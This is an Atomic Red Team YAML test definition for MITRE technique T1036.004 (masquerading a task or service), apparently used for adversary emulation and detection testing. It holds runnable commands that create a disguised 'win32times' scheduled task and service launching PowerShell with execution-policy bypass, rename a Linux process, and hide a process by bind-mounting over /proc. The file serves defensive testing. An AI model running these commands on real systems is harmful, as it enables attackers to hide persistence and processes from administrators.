Atomic Red Team doc generator
76 lines
2.8 KiB
YAML
76 lines
2.8 KiB
YAML
attack_technique: T1036.004
|
|
display_name: 'Masquerading: Masquerade Task or Service'
|
|
atomic_tests:
|
|
- name: Creating W32Time similar named service using schtasks
|
|
auto_generated_guid: f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9
|
|
description: Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao"
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -ep bypass -file c:\T1036.004_NonExistingScript.ps1" /tn win32times /f
|
|
schtasks /query /tn win32times
|
|
cleanup_command: |
|
|
schtasks /tn win32times /delete /f
|
|
name: command_prompt
|
|
elevation_required: true
|
|
- name: Creating W32Time similar named service using sc
|
|
auto_generated_guid: b721c6ef-472c-4263-a0d9-37f1f4ecff66
|
|
description: Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao"
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
sc create win32times binPath= "cmd /c start c:\T1036.004_NonExistingScript.ps1"
|
|
sc qc win32times
|
|
cleanup_command: |
|
|
sc delete win32times
|
|
name: command_prompt
|
|
elevation_required: true
|
|
- name: linux rename /proc/pid/comm using prctl
|
|
auto_generated_guid: f0e3aaea-5cd9-4db6-a077-631dd19b27a8
|
|
description: |
|
|
Runs a C program that calls prctl(PR_SET_NAME) to modify /proc/pid/comm value to "totally_legit". This will show up as process name in simple 'ps' listings.
|
|
supported_platforms:
|
|
- linux
|
|
input_arguments:
|
|
exe_path:
|
|
description: Output Binary Path
|
|
type: path
|
|
default: /tmp/T1036_004_prctl_rename
|
|
dependency_executor_name: sh
|
|
dependencies:
|
|
- description: |
|
|
#{exe_path} must be exist on system.
|
|
prereq_command: |
|
|
stat #{exe_path}
|
|
get_prereq_command: |
|
|
cc -o #{exe_path} PathToAtomicsFolder/T1036.004/src/prctl_rename.c
|
|
executor:
|
|
name: sh
|
|
command: |
|
|
#{exe_path} & ps
|
|
TMP=`ps | grep totally_legit`
|
|
if [ -z "${TMP}" ] ; then echo "renamed process NOT FOUND in process list" && exit 1; fi
|
|
exit 0
|
|
cleanup_command: |
|
|
rm -f #{exe_path}
|
|
- name: Hiding a malicious process with bind mounts
|
|
auto_generated_guid: ad4b73c2-d6e2-4d8b-9868-4c6f55906e01
|
|
description: |
|
|
Creates a malicious process and hides it by bind mounting to the /proc filesystem of a benign process
|
|
supported_platforms:
|
|
- linux
|
|
executor:
|
|
elevation_required: true
|
|
command: |
|
|
eval '(while true; do :; done) &'
|
|
echo $! > /tmp/evil_pid.txt
|
|
random_kernel_pid=$(ps -ef | grep "\[.*\]" | awk '{print $2}' | shuf -n 1)
|
|
sudo mount -B /proc/$random_kernel_pid /proc/$(cat /tmp/evil_pid.txt)
|
|
cleanup_command: |
|
|
kill $(cat /tmp/evil_pid.txt) || echo "Failed to kill PID $evil_pid"
|
|
rm /tmp/evil_pid.txt
|
|
name: sh
|
|
|